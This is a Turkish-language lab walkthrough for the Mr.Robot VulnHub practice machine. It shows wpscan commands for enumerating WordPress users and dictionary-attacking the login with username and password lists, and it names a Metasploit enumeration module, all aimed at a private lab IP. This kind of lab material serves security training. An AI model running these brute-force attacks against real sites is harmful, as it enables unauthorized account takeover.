Not: Yazıda kullanılan Mr.Robot sanal makinesi Vulnhub sitesinden indirilebilir.
https://www.vulnhub.com/entry/mr-robot-1,151/
Mr.Robot sanal makinesinin 80. portuna web browser ile girildiğinde bir web sitesi ile karşılaşılmaktadır.
Bu web sitesi WordPress üzerine kuruludur ve “wp-login” sayfası ile oturum açılabilmektedir.
http://192.168.2.58/wp-login
Sözlük saldırısı için “wpscan” aracı da kullanılabilir. wpscan aracı ile kullanıcı tespiti varsayılan olarak aşağıdaki gibi gerçekleştirilebilir.
wpscan -u http://192.168.2.58 -e u
(veya) wpscan –url 192.168.2.58 –enumerate u
Kullanıcı adı ve Parola listesi kullanılarak da sözlük saldırısı gerçekleştirilebilir. Örnek kullanıcı ve parola listesi aşağıdaki gibidir.
Tek bir kullanıcı adı (elliot) ile parola tespiti gerçekleştirilebilir.
wpscan –url http://192.168.2.58 –wordlist /root/Parolalar -U elliot
Bunun yanında kullanıcı adı ve parola listesi verilerek de sözlük saldırısı gerçekleştirilebilir.
wpscan -u http://192.168.2.58 –wordlist /root/Parolalar –usernames /root/Kullanicilar
Elde edilen bu kullanıcı bilgileri ile oturum açılabildiği görülmüştür.
Not: “wpscan” aracı ile detaylı bir tarama gerçekleştirmek için aşağıdaki gibi bir komut kullanılabilir.
wpscan -u http://192.168.2.58 -e ap -e at -e u
Benzer olarak MSF “wordpress_login_enum” modülünü kullanarak da kullanıcı tespiti gerçekleştirilebilirdi.
auxiliary/scanner/http/wordpress_login_enum
Kaynak:
https://www.hempstutorials.co.uk/mr-robot1-ctf-walkthrough/
https://hackertarget.com/wordpress-user-enumeration/